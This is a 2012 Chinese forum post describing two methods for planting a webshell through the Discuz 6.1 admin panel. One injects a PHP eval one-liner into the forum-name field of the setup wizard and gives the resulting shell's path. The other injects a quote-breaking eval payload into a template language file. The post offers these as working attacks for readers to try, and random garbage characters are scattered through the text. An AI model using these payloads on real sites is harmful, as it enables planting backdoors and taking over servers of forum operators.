discuz6.1两种方法后台拿shell
3 V* b" |) b0 g/ n0 W好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下+ h5 n2 e" w- R, H2 d3 i5 ^
1:
# x# S( O$ h' A3 [" Zhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes; Y* O4 Z, y c8 m$ s9 q
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
% ~4 ?: I6 b0 j/ S<?php eval($_POST[cmd]);?>) q! o: e& S- n9 v' c
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
( Z( a. z3 o) [0 J; @
6 E7 d, N, T$ P O
6 m, _# [1 {0 P2:后台模板管理--默认模板套系--详情
1 E7 D6 O/ r' U1 }, a. h, @templates/default/actions.lang.php0 L4 }2 @6 z0 N: M" c7 i
jhackj\\');eval($_POST[cmd])?>;//% w! }3 [2 p/ W3 y; U' [. }
: h. `; n% d# j利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对